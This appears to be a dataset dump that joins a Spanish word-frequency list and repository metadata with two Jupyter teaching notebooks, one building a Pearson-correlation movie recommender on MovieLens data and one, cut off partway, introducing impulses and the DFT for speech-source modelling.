14\nLa 388\ncon 449\nla 15\nde 82\nsegunda 157\nmundial 182\nen 111\nlas 30\nlas 102\ncomo 124\nen 50\nlos 12\ndel 132\ncristianismo 110\nde 17\nen 171\nlos 28\ny 50\nsincretismo 63\nen 20\nes 313\nLa 317\nse 313\ncatólicos 85\nde 54\nmillones 17\nde 18\ndel 14\nEn 518\nlos 114\nen 70\nun 269\nque 146\ncon 389\nla 17\ncomo 129\ny 303\nque 153\nuna 96\nen 37\ny 81\nel 298\nla 24\ndel 136\nde 64\nelementos 330\nde 23\nla 136\nel 448\nde 23\nlos 194\nque 17\nde 277\nhablantes 139\nno 432\ny 118\nla 31\nde 36\nla 30\ndel 195\nMéxico 355\nse 59\nen 61\nde 34\no 54\nen 27\nEl 179\nque 229\nde 42\ntiene 569\nlos 179\nde 60\nde 102\nen 23\nde 11\nse 335\nde 22\nSan 10\nde 92\nlengua 24\nde 26\nen 39\nque 41\nla 41\nlengua 35\nde 7\nde 10\nde 93\nun 33\nde 38\npor 31\nde 110\nde 241\nlos 20\ny 51\nel 28\nsistema 46\nde 126\nde 24\nMéxico 386\nel 231\nde 37\nel 418\nEl 166\nde 12\nla 103\nde 234\neducación 1131\nde 69\nen 99\nNacional 44\nde 33\nque 81\nla 86\nde 52\nla 59\nEn 530\nde 114\nmexicano 565\ndel 40\nde 15\nEn 433\nde 15\nde 44\nen 301\nla 42\nópera 137\nde 84\nla 216\noperística 255\nde 136\ndel 119\ndifusión 313\nde 120\nla 22\nde 116\nde 54\nun 230\nde 32\nel 28\ny 75\nLa 193\ndanza 329\ndel 740\nen 148\nla 117\nmúsica 156\nde 27\nes 362\nel 531\nde 135\nla 42\ncon 149\ncantantes 33\ndel 75\nson 261\nson 22\ny 59\nla 36\nde 142\nde 31\nla 15\nuna 52\nel 28\nlos 108\ndel 58\nno 36\npor 180\nde 40\nbolero 245\nde 23\nmúsica 430\ny 29\nde 221\nentre 222\nLa 95\nen 49\ny 205\nel 98\nmúsica 225\nen 214\nde 92\nel 16\na 46\nmariachi 72\na 16\nson 41\nde 22\nmúsica 454\ncon 190\ny 41\ny 41\nmúsica 577\ny 79\nse 190\nla 210\nla 119\na 358\nLa 145\nel 34\nmovimiento 56\nde 92\nlos 144\nDurante 168\nlas 118\na 50\nlos 126\nlos 145\nen 25\nla 162\nque 56\nse 49\nse 419\nlas 105\ny 69\nde 37\nel 112\nlos 444\nde 25\nse 103\nla 22\nel 14\npaso 117\na 541\ny 30\nla 232\nde 39\nde 47\nel 19\nde 38\nla 106\nJuan 8\nJosé 79\nde 66\nMéxico 331\ngrupo 163\nLa 53\nen 77\nlas 191\nde 16\nlas 15\nel 82\nde 15\nque 68\nse 442\nde 26\nlos 235\ny 54\ndel 202\nJosé 82\nLa 282\ny 46\nla 41\nde 36\nel 12\nde 106\ninfluencia 462\nde 124\ny 38\nde 40\nThomas 22\nen 35\nde 101\na 162\nuna 527\ndel 124\ndel 20\ny 35\nla 28\nla 58\nde 9\nla 63\nurbanismo 177\nla 37\nde 28\nla 294\nel 72\ny 51\nel 11\na 339\nde 34\nla 55\nde 46\nidentidad 167\narquitectura 204\ndel 13\nde 55\nde 70\nde 100\ncon 187\nde 27\nque 210\nla 7\nde 14\ndel 223\nde 68\ny 102\ny 18\ny 17\ny 17\ny 8\nLas 188\npelículas 726\nde 10\ndel 142\nel 29\nal 73\ny 52\nque 125\nel 315\ncomo 176\nse 238\nde 107\nsu 204\nen 383\nque 36\nsus 13\nla 50\nHumanidad 394\norigen 145\nel 7\nen 218\nla 60\nel 162\nla 120\nde 41\nel 9\nla 280\nde 81\nen 25\ny 79\nel 49\nLa 120\nde 38\nde 159\nlos 51\nla 103\nsu 519\ny 150\nde 12\ncon 83\ncarne 29\nde 52\nlas 40\nel 12\nel 10\nel 23\nun 327\nsector 278\nen 69\nEn 450\nla 344\nde 53\nmexicana 258\ny 33\nel 443\ndel 10\nsiglo 117\nde 70\ncon 388\nun 211\nde 7\n2010 136\nel 33\nde 7\nse 194\nde 33\nun 641\nrecorrido 116\nla 41\nde 104\nla 303\nde 165\nun 104\nconstante 145\ndeportes 93\nel 18\nde 49\ny 62\nla 10\nLiga 71\nmayor 639\nde 61\nde 18\nla 18\na 25\nLa 226\nselección 100\nde 51\nla 57\ndeporte 142\nmás 45\nen 330\ny 167\ntiene 428\na 24\nque 113\nde 11\nen 88\nla 24\nLiga 41\nNorte 26\nde 29\nBéisbol 41\nde 36\nla 31\nLiga 33\nde 45\nBéisbol 119\nson 58\nen 16\nla 9\nEn 264\nla 30\nsede 105\nel 33\nlos 49\nla 104\nla 57\nEl 1268\nde 32\nel 55\nde 24\nVoleibol 92\ny 537\nde 26\nla 57\nEn 355\nla 63\nCiudad 241\nde 16\nde 102\nde 35\nde 22\nel 181\nla 67\nLa 129\nen 13\nque 220\nla 345\ny 147\nde 254\nen 13\nTrinquete 66\nFemenil 33\nde 27\nla 13\nla 175\nde 31\nMéxico 229\n1968 117\nde 8\nEl 371\nlucha 282\nel 88\nLa 106\nPlaza 44\nque 49\nde 14\nCiudad 92\nMéxico 335\nde 75\ne 198\nMéxico 72\nen 7\nel 43\nen 294\ny 78\nGuanajuato 18\nde 42\nel 11\nde 31\nMéxico 288\nfue 335\npor 17\nuna 354\nel 114\nde 68\nla 261\nen 47\nla 30\nde 30\nMéxico 358\nha 276\nMéxico 362\ny 111\nha 447\nde 16\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ] ]
e72fb7c741490e2003c5d80ba74186be748852fd
78,663
ipynb
Jupyter Notebook
ML0101EN-RecSys-Collaborative-Filtering-movies-py-v1.ipynb
CosmiX-6/Mahine-Learning-with-Python
f04b9db4ecad9610d3097ea08c8024af428eaa45
[ "BSD-4-Clause-UC" ]
null
null
null
ML0101EN-RecSys-Collaborative-Filtering-movies-py-v1.ipynb
CosmiX-6/Mahine-Learning-with-Python
f04b9db4ecad9610d3097ea08c8024af428eaa45
[ "BSD-4-Clause-UC" ]
null
null
null
ML0101EN-RecSys-Collaborative-Filtering-movies-py-v1.ipynb
CosmiX-6/Mahine-Learning-with-Python
f04b9db4ecad9610d3097ea08c8024af428eaa45
[ "BSD-4-Clause-UC" ]
null
null
null
30.667836
2,822
0.447707
[ [ [ "<center>\n <img src=\"https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ML0101EN-SkillsNetwork/labs/Module%205/images/IDSNlogo.png\" width=\"300\" alt=\"cognitiveclass.ai logo\" />\n</center>\n\n# Collaborative Filtering\n\nEstimated time needed: **25** minutes\n\n## Objectives\n\nAfter completing this lab you will be able to:\n\n* Create recommendation system based on collaborative filtering\n", "_____no_output_____" ], [ "Recommendation systems are a collection of algorithms used to recommend items to users based on information taken from the user. These systems have become ubiquitous can be commonly seen in online stores, movies databases and job finders. In this notebook, we will explore recommendation systems based on Collaborative Filtering and implement simple version of one using Python and the Pandas library.\n", "_____no_output_____" ], [ "<h1>Table of contents</h1>\n\n<div class=\"alert alert-block alert-info\" style=\"margin-top: 20px\">\n <ol>\n <li><a href=\"https://#ref1\">Acquiring the Data</a></li>\n <li><a href=\"https://#ref2\">Preprocessing</a></li>\n <li><a href=\"https://#ref3\">Collaborative Filtering</a></li>\n </ol>\n</div>\n<br>\n<hr>\n", "_____no_output_____" ], [ "<a id=\"ref1\"></a>\n\n# Acquiring the Data\n", "_____no_output_____" ], [ "To acquire and extract the data, simply run the following Bash scripts:\\\nDataset acquired from [GroupLens](http://grouplens.org/datasets/movielens/?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01). Let's download the dataset. To download the data, we will use **`!wget`** to download it from IBM Object Storage.\\\n**Did you know?** When it comes to Machine Learning, you will likely be working with large datasets. As a business, where can you host your data? IBM is offering a unique opportunity for businesses, with 10 Tb of IBM Cloud Object Storage: [Sign up now for free](http://cocl.us/ML0101EN-IBM-Offer-CC)\n", "_____no_output_____" ] ], [ [ "!wget -O moviedataset.zip https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ML0101EN-SkillsNetwork/labs/Module%205/data/moviedataset.zip\nprint('unziping ...')\n!unzip -o -j moviedataset.zip ", "--2021-09-11 13:35:55-- https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ML0101EN-SkillsNetwork/labs/Module%205/data/moviedataset.zip\nResolving cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud (cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud)... 169.63.118.104\nConnecting to cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud (cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud)|169.63.118.104|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 160301210 (153M) [application/zip]\nSaving to: ‘moviedataset.zip’\n\nmoviedataset.zip 100%[===================>] 152.88M 41.1MB/s in 3.7s \n\n2021-09-11 13:35:59 (41.1 MB/s) - ‘moviedataset.zip’ saved [160301210/160301210]\n\nunziping ...\nArchive: moviedataset.zip\n inflating: links.csv \n inflating: movies.csv \n inflating: ratings.csv \n inflating: README.txt \n inflating: tags.csv \n" ] ], [ [ "Now you're ready to start working with the data!\n", "_____no_output_____" ], [ "<hr>\n\n<a id=\"ref2\"></a>\n\n# Preprocessing\n", "_____no_output_____" ], [ "First, let's get all of the imports out of the way:\n", "_____no_output_____" ] ], [ [ "#Dataframe manipulation library\nimport pandas as pd\n#Math functions, we'll only need the sqrt function so let's import only that\nfrom math import sqrt\nimport numpy as np\nimport matplotlib.pyplot as plt\n%matplotlib inline", "_____no_output_____" ] ], [ [ "Now let's read each file into their Dataframes:\n", "_____no_output_____" ] ], [ [ "#Storing the movie information into a pandas dataframe\nmovies_df = pd.read_csv('movies.csv')\n#Storing the user information into a pandas dataframe\nratings_df = pd.read_csv('ratings.csv')", "_____no_output_____" ] ], [ [ "Let's also take a peek at how each of them are organized:\n", "_____no_output_____" ] ], [ [ "#Head is a function that gets the first N rows of a dataframe. N's default is 5.\nmovies_df.head()", "_____no_output_____" ] ], [ [ "So each movie has a unique ID, a title with its release year along with it (Which may contain unicode characters) and several different genres in the same field. Let's remove the year from the title column and place it into its own one by using the handy [extract](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.str.extract.html?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01#pandas.Series.str.extract) function that Pandas has.\n", "_____no_output_____" ], [ "Let's remove the year from the **title** column by using pandas' replace function and store in a new **year** column.\n", "_____no_output_____" ] ], [ [ "#Using regular expressions to find a year stored between parentheses\n#We specify the parantheses so we don't conflict with movies that have years in their titles\nmovies_df['year'] = movies_df.title.str.extract('(\\(\\d\\d\\d\\d\\))',expand=False)\n#Removing the parentheses\nmovies_df['year'] = movies_df.year.str.extract('(\\d\\d\\d\\d)',expand=False)\n#Removing the years from the 'title' column\nmovies_df['title'] = movies_df.title.str.replace('(\\(\\d\\d\\d\\d\\))', '')\n#Applying the strip function to get rid of any ending whitespace characters that may have appeared\nmovies_df['title'] = movies_df['title'].apply(lambda x: x.strip())", "_____no_output_____" ] ], [ [ "Let's look at the result!\n", "_____no_output_____" ] ], [ [ "movies_df.head()", "_____no_output_____" ] ], [ [ "With that, let's also drop the genres column since we won't need it for this particular recommendation system.\n", "_____no_output_____" ] ], [ [ "#Dropping the genres column\nmovies_df = movies_df.drop('genres', 1)", "_____no_output_____" ] ], [ [ "Here's the final movies dataframe:\n", "_____no_output_____" ] ], [ [ "movies_df.head()", "_____no_output_____" ] ], [ [ "<br>\n", "_____no_output_____" ], [ "Next, let's look at the ratings dataframe.\n", "_____no_output_____" ] ], [ [ "ratings_df.head()", "_____no_output_____" ] ], [ [ "Every row in the ratings dataframe has a user id associated with at least one movie, a rating and a timestamp showing when they reviewed it. We won't be needing the timestamp column, so let's drop it to save on memory.\n", "_____no_output_____" ] ], [ [ "#Drop removes a specified row or column from a dataframe\nratings_df = ratings_df.drop('timestamp', 1)", "_____no_output_____" ] ], [ [ "Here's how the final ratings Dataframe looks like:\n", "_____no_output_____" ] ], [ [ "ratings_df.head()", "_____no_output_____" ] ], [ [ "<hr>\n\n<a id=\"ref3\"></a>\n\n# Collaborative Filtering\n", "_____no_output_____" ], [ "Now it's time to start our work on recommendation systems.\n\nThe first technique we're going to take a look at is called **Collaborative Filtering**, which is also known as **User-User Filtering**. As hinted by its alternate name, this technique uses other users to recommend items to the input user. It attempts to find users that have similar preferences and opinions as the input and then recommends items that they have liked to the input. There are several methods of finding similar users (Even some making use of Machine Learning), and the one we will be using here is going to be based on the **Pearson Correlation Function**.\n\n<img src=\"https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ML0101EN-SkillsNetwork/labs/Module%205/images/User_Item.png\" width=800px>\n\nThe process for creating a User Based recommendation system is as follows:\n\n* Select a user with the movies the user has watched\n* Based on his rating to movies, find the top X neighbours\n* Get the watched movie record of the user for each neighbour.\n* Calculate a similarity score using some formula\n* Recommend the items with the highest score\n\nLet's begin by creating an input user to recommend movies to:\n\nNotice: To add more movies, simply increase the amount of elements in the userInput. Feel free to add more in! Just be sure to write it in with capital letters and if a movie starts with a \"The\", like \"The Matrix\" then write it in like this: 'Matrix, The' .\n", "_____no_output_____" ] ], [ [ "userInput = [\n {'title':'Breakfast Club, The', 'rating':5},\n {'title':'Toy Story', 'rating':3.5},\n {'title':'Jumanji', 'rating':2},\n {'title':\"Pulp Fiction\", 'rating':5},\n {'title':'Akira', 'rating':4.5}\n ] \ninputMovies = pd.DataFrame(userInput)\ninputMovies", "_____no_output_____" ] ], [ [ "#### Add movieId to input user\n\nWith the input complete, let's extract the input movies's ID's from the movies dataframe and add them into it.\n\nWe can achieve this by first filtering out the rows that contain the input movies' title and then merging this subset with the input dataframe. We also drop unnecessary columns for the input to save memory space.\n", "_____no_output_____" ] ], [ [ "#Filtering out the movies by title\ninputId = movies_df[movies_df['title'].isin(inputMovies['title'].tolist())]\n#Then merging it so we can get the movieId. It's implicitly merging it by title.\ninputMovies = pd.merge(inputId, inputMovies)\n#Dropping information we won't use from the input dataframe\ninputMovies = inputMovies.drop('year', 1)\n#Final input dataframe\n#If a movie you added in above isn't here, then it might not be in the original \n#dataframe or it might spelled differently, please check capitalisation.\ninputMovies", "_____no_output_____" ] ], [ [ "#### The users who has seen the same movies\n\nNow with the movie ID's in our input, we can now get the subset of users that have watched and reviewed the movies in our input.\n", "_____no_output_____" ] ], [ [ "#Filtering out users that have watched movies that the input has watched and storing it\nuserSubset = ratings_df[ratings_df['movieId'].isin(inputMovies['movieId'].tolist())]\nuserSubset.head()", "_____no_output_____" ] ], [ [ "We now group up the rows by user ID.\n", "_____no_output_____" ] ], [ [ "#Groupby creates several sub dataframes where they all have the same value in the column specified as the parameter\nuserSubsetGroup = userSubset.groupby(['userId'])", "_____no_output_____" ] ], [ [ "Let's look at one of the users, e.g. the one with userID=1130.\n", "_____no_output_____" ] ], [ [ "userSubsetGroup.get_group(1130)", "_____no_output_____" ] ], [ [ "Let's also sort these groups so the users that share the most movies in common with the input have higher priority. This provides a richer recommendation since we won't go through every single user.\n", "_____no_output_____" ] ], [ [ "#Sorting it so users with movie most in common with the input will have priority\nuserSubsetGroup = sorted(userSubsetGroup, key=lambda x: len(x[1]), reverse=True)", "_____no_output_____" ] ], [ [ "Now let's look at the first user.\n", "_____no_output_____" ] ], [ [ "userSubsetGroup[0:3]", "_____no_output_____" ] ], [ [ "#### Similarity of users to input user\n\nNext, we are going to compare all users (not really all !!!) to our specified user and find the one that is most similar.\\\nwe're going to find out how similar each user is to the input through the **Pearson Correlation Coefficient**. It is used to measure the strength of a linear association between two variables. The formula for finding this coefficient between sets X and Y with N values can be seen in the image below.\n\nWhy Pearson Correlation?\n\nPearson correlation is invariant to scaling, i.e. multiplying all elements by a nonzero constant or adding any constant to all elements. For example, if you have two vectors X and Y,then, pearson(X, Y) == pearson(X, 2 \\* Y + 3). This is a pretty important property in recommendation systems because for example two users might rate two series of items totally different in terms of absolute rates, but they would be similar users (i.e. with similar ideas) with similar rates in various scales .\n\n![alt text](https://wikimedia.org/api/rest_v1/media/math/render/svg/bd1ccc2979b0fd1c1aec96e386f686ae874f9ec0 \"Pearson Correlation\")\n\nThe values given by the formula vary from r = -1 to r = 1, where 1 forms a direct correlation between the two entities (it means a perfect positive correlation) and -1 forms a perfect negative correlation.\n\nIn our case, a 1 means that the two users have similar tastes while a -1 means the opposite.\n", "_____no_output_____" ], [ "We will select a subset of users to iterate through. This limit is imposed because we don't want to waste too much time going through every single user.\n", "_____no_output_____" ] ], [ [ "userSubsetGroup = userSubsetGroup[0:100]", "_____no_output_____" ] ], [ [ "Now, we calculate the Pearson Correlation between input user and subset group, and store it in a dictionary, where the key is the user Id and the value is the coefficient.\n", "_____no_output_____" ] ], [ [ "#Store the Pearson Correlation in a dictionary, where the key is the user Id and the value is the coefficient\npearsonCorrelationDict = {}\n\n#For every user group in our subset\nfor name, group in userSubsetGroup:\n #Let's start by sorting the input and current user group so the values aren't mixed up later on\n group = group.sort_values(by='movieId')\n inputMovies = inputMovies.sort_values(by='movieId')\n #Get the N for the formula\n nRatings = len(group)\n #Get the review scores for the movies that they both have in common\n temp_df = inputMovies[inputMovies['movieId'].isin(group['movieId'].tolist())]\n #And then store them in a temporary buffer variable in a list format to facilitate future calculations\n tempRatingList = temp_df['rating'].tolist()\n #Let's also put the current user group reviews in a list format\n tempGroupList = group['rating'].tolist()\n #Now let's calculate the pearson correlation between two users, so called, x and y\n Sxx = sum([i**2 for i in tempRatingList]) - pow(sum(tempRatingList),2)/float(nRatings)\n Syy = sum([i**2 for i in tempGroupList]) - pow(sum(tempGroupList),2)/float(nRatings)\n Sxy = sum( i*j for i, j in zip(tempRatingList, tempGroupList)) - sum(tempRatingList)*sum(tempGroupList)/float(nRatings)\n \n #If the denominator is different than zero, then divide, else, 0 correlation.\n if Sxx != 0 and Syy != 0:\n pearsonCorrelationDict[name] = Sxy/sqrt(Sxx*Syy)\n else:\n pearsonCorrelationDict[name] = 0\n", "_____no_output_____" ], [ "pearsonCorrelationDict.items()", "_____no_output_____" ], [ "pearsonDF = pd.DataFrame.from_dict(pearsonCorrelationDict, orient='index')\npearsonDF.columns = ['similarityIndex']\npearsonDF['userId'] = pearsonDF.index\npearsonDF.index = range(len(pearsonDF))\npearsonDF.head()", "_____no_output_____" ] ], [ [ "#### The top x similar users to input user\n\nNow let's get the top 50 users that are most similar to the input.\n", "_____no_output_____" ] ], [ [ "topUsers=pearsonDF.sort_values(by='similarityIndex', ascending=False)[0:50]\ntopUsers.head()", "_____no_output_____" ] ], [ [ "Now, let's start recommending movies to the input user.\n\n#### Rating of selected users to all movies\n\nWe're going to do this by taking the weighted average of the ratings of the movies using the Pearson Correlation as the weight. But to do this, we first need to get the movies watched by the users in our **pearsonDF** from the ratings dataframe and then store their correlation in a new column called \\_similarityIndex\". This is achieved below by merging of these two tables.\n", "_____no_output_____" ] ], [ [ "topUsersRating=topUsers.merge(ratings_df, left_on='userId', right_on='userId', how='inner')\ntopUsersRating.head()", "_____no_output_____" ] ], [ [ "Now all we need to do is simply multiply the movie rating by its weight (The similarity index), then sum up the new ratings and divide it by the sum of the weights.\n\nWe can easily do this by simply multiplying two columns, then grouping up the dataframe by movieId and then dividing two columns:\n\nIt shows the idea of all similar users to candidate movies for the input user:\n", "_____no_output_____" ] ], [ [ "#Multiplies the similarity by the user's ratings\ntopUsersRating['weightedRating'] = topUsersRating['similarityIndex']*topUsersRating['rating']\ntopUsersRating.head()", "_____no_output_____" ], [ "#Applies a sum to the topUsers after grouping it up by userId\ntempTopUsersRating = topUsersRating.groupby('movieId').sum()[['similarityIndex','weightedRating']]\ntempTopUsersRating.columns = ['sum_similarityIndex','sum_weightedRating']\ntempTopUsersRating.head()", "_____no_output_____" ], [ "#Creates an empty dataframe\nrecommendation_df = pd.DataFrame()\n#Now we take the weighted average\nrecommendation_df['weighted average recommendation score'] = tempTopUsersRating['sum_weightedRating']/tempTopUsersRating['sum_similarityIndex']\nrecommendation_df['movieId'] = tempTopUsersRating.index\nrecommendation_df.head()", "_____no_output_____" ] ], [ [ "Now let's sort it and see the top 20 movies that the algorithm recommended!\n", "_____no_output_____" ] ], [ [ "recommendation_df = recommendation_df.sort_values(by='weighted average recommendation score', ascending=False)\nrecommendation_df.head(10)", "_____no_output_____" ], [ "movies_df.loc[movies_df['movieId'].isin(recommendation_df.head(10)['movieId'].tolist())]", "_____no_output_____" ] ], [ [ "### Advantages and Disadvantages of Collaborative Filtering\n\n##### Advantages\n\n* Takes other user's ratings into consideration\n* Doesn't need to study or extract information from the recommended item\n* Adapts to the user's interests which might change over time\n\n##### Disadvantages\n\n* Approximation function can be slow\n* There might be a low of amount of users to approximate\n* Privacy issues when trying to learn the user's preferences\n", "_____no_output_____" ], [ "<h2>Want to learn more?</h2>\n\nIBM SPSS Modeler is a comprehensive analytics platform that has many machine learning algorithms. It has been designed to bring predictive intelligence to decisions made by individuals, by groups, by systems – by your enterprise as a whole. A free trial is available through this course, available here: <a href=\"https://www.ibm.com/analytics/spss-statistics-software?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01\">SPSS Modeler</a>\n\nAlso, you can use Watson Studio to run these notebooks faster with bigger datasets. Watson Studio is IBM's leading cloud solution for data scientists, built by data scientists. With Jupyter notebooks, RStudio, Apache Spark and popular libraries pre-packaged in the cloud, Watson Studio enables data scientists to collaborate on their projects without having to install anything. Join the fast-growing community of Watson Studio users today with a free account at <a href=\"https://www.ibm.com/cloud/watson-studio?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01\">Watson Studio</a>\n", "_____no_output_____" ], [ "### Thank you for completing this lab!\n\n## Author\n\nSaeed Aghabozorgi\n\n### Other Contributors\n\n<a href=\"https://www.linkedin.com/in/joseph-s-50398b136/?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01\" target=\"_blank\">Joseph Santarcangelo</a>\n\n## Change Log\n\n| Date (YYYY-MM-DD) | Version | Changed By | Change Description |\n| ----------------- | ------- | ---------- | ---------------------------------- |\n| 2020-11-03 | 2.1 | Lakshmi | Updated URL of csv |\n| 2020-08-27 | 2.0 | Lavanya | Moved lab to course repo in GitLab |\n| | | | |\n| | | | |\n\n## <h3 align=\"center\"> © IBM Corporation 2020. All rights reserved. <h3/>\n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ] ]
e72fb842d59908680d402a919fa294f9398670e7
15,101
ipynb
Jupyter Notebook
signals/signals-lab-2/signals-2-1-impulse-as-source.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
19
2020-09-20T17:01:53.000Z
2021-12-15T18:24:06.000Z
signals/signals-lab-2/signals-2-1-impulse-as-source.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
null
null
null
signals/signals-lab-2/signals-2-1-impulse-as-source.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
10
2020-09-25T08:09:50.000Z
2021-09-14T03:28:01.000Z
34.088036
351
0.598305
[ [ [ "#### _Speech Processing Labs 2021: SIGNALS 2: Building the Source_", "_____no_output_____" ] ], [ [ "## Run this first!\n%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport cmath\nfrom math import floor\nfrom matplotlib.animation import FuncAnimation\nfrom IPython.display import HTML\nplt.style.use('ggplot')\n\nfrom dspMisc import * ", "_____no_output_____" ] ], [ [ "# Building the Source\n\n### Learning Outcomes\n* Be able to describe what an impulse train is\n* Be able to explain why an impulse train is used to model the voice source\n* Be able to describe the frequency response of single impulse and and impulse train\n\n\n### Need to Know\n* Topic Videos: Harmonics, Impulse Train, Frequency Domain\n* [Interpreting the Discrete Fourier Transform](../signals-lab-1/signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)\n\n\n\n", "_____no_output_____" ], [ "## 1 A Single Impulse Response\n\nThe previous notebooks looked at [the DFT and how to interpret it's outputs](../signals-lab-1/signals-1-1-interpreting-the-discrete-fourier-transform.ipynb). With an understanding of that, we can start thinking about how this ability to go from the time domain to the frequency domain (and back again) can help us build up a model of speech. \n\nLet's start simple: What happens when the input is just a single **impulse**? What can this tell us? \n\nThe following code cells generate a single impulse in an input sequence of length `N=64`, given a specific sampling rate `f_s`. As we saw previously, the DFT frequency resolution is completely determined by these two parameters. \n", "_____no_output_____" ] ], [ [ "## Set the number of samples N, sampling rate f_s\n## As usual all our interpretation of the DFT outputs will depend on the values of these parameters\n\nN=64\n\n#sampling rate: \nf_s = 64\n\n## sample time\nt_s = 1/f_s\n\n## Check our parameters\nprint(\"Number of samples: N = %d\" % N)\nprint(\"sampling rate: f_s = %f\\nsampling time: t_s: %f\" % (f_s, t_s))\n\n", "_____no_output_____" ], [ "## indices of input sequence of size N\nnsteps = np.array(range(N))\n\n## the sequence of time steps given the sampling rate \ntime_steps = t_s * nsteps\n\n## Now let's create an impulse response\n# First, we create a sequence of length N but all zeros\nx_impulse = np.zeros(N)\n\n# And then set a single element to be 1, i.e. a single impulse\nx_impulse[1]=1\n\n## Now, we plot it:\nfig, timedom = plt.subplots(figsize=(16, 4))\ntimedom.scatter(time_steps, x_impulse, color='magenta')\ntimedom.plot(time_steps, x_impulse, color='magenta')\n\ntimedom.set_ylabel(\"Amplitude\")\ntimedom.set_xlabel(\"Time (s)\")\ntimedom.set_title(\"A single impulse as input\")\n\n", "_____no_output_____" ] ], [ [ "The plot above shows an time vs amplitude graph of input $x[n]$, where all but 1 of the $N=64$ input points are zero, and $x[1]=1$. \n\nNow let's look at the DFT of this single impulse.", "_____no_output_____" ] ], [ [ "## Now let's look at the DFT outputs of the impulse: \nmag_impulse, phase_impulse = get_dft_mag_phase(x_impulse, N)\n\n## Note: in this case N=f_s so the DFT output frequencies are the same as the DFT output indices\n## We'll look at cases where this differs later\ndft_freqs = get_dft_freqs_all(f_s, N)\n\n## plot the magnitudes, but this time we're going to need to zoom in a bit on the y-axis: \nfig, fdom = plt.subplots(figsize=(16, 4))\nfdom.set(ylim=(-1, 4))\nfdom.plot([0,np.max(dft_freqs)], [0,0], color='grey')\nfdom.scatter(dft_freqs, mag_impulse)\nfdom.set_xlabel(\"Frequency (Hz)\")\nfdom.set_ylabel(\"Magnitude\")\n\n## Plot the phases\nfig, fdom = plt.subplots(figsize=(16, 